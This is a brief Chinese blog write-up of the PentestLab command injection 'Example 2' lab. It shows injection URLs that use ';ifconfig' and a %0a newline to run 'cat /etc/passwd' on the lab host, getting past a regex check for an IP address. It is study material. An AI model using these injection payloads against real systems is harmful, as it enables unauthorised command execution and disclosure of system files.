辰鑫chenxin

关注

PentestLab-web安全命令注入-EXP2

辰鑫chenxin

关注

阅读 49

2023-04-05


我们打开靶机

选择“Example 2”


PentestLab-web安全命令注入-EXP2_正则


观察页面


PentestLab-web安全命令注入-EXP2_正则_02


我们尝试


http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1;ifconfig


结果


PentestLab-web安全命令注入-EXP2_IP_03


我们尝试%0a


PentestLab-web安全命令注入-EXP2_php_04


于是payload为


http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1%0acat%20/etc/passwd


结果


PentestLab-web安全命令注入-EXP2_IP_05


我们观察靶机源码


PentestLab-web安全命令注入-EXP2_php_06


使用了正则来匹配IP地址

可以使用%0a进行截断

相关推荐

孟佳

PentestLab-web安全SQL注入-EXP2

孟佳 44 0 0

猫er聆听没落的旋律

PentestLab-web安全目录穿越-EXP2

猫er聆听没落的旋律 58 0 0

前端王祖蓝

PentestLab-web安全XML测试-EXP2

前端王祖蓝 36 0 0

钵仔糕的波波仔

PentestLab-web安全LDAP测试-EXP2

钵仔糕的波波仔 50 0 0

上善若水山西太原

PentestLab-web安全文件包含-EXP2

上善若水山西太原 80 0 0

萧让听雪

PentestLab-web安全命令注入-EXP1

萧让听雪 35 0 0

老榆

PentestLab-web安全文件上传测试-EXP2

老榆 53 0 0

酷子腿长一米八

PentestLab-web安全SQL注入-EXP5

酷子腿长一米八 37 0 0

彩虹_bd07

PentestLab-web安全SQL注入-EXP6

彩虹_bd07 50 0 0

yeamy

PentestLab-web安全目录穿越-EXP3

yeamy 38 0 0

精彩评论(0)

0 0 举报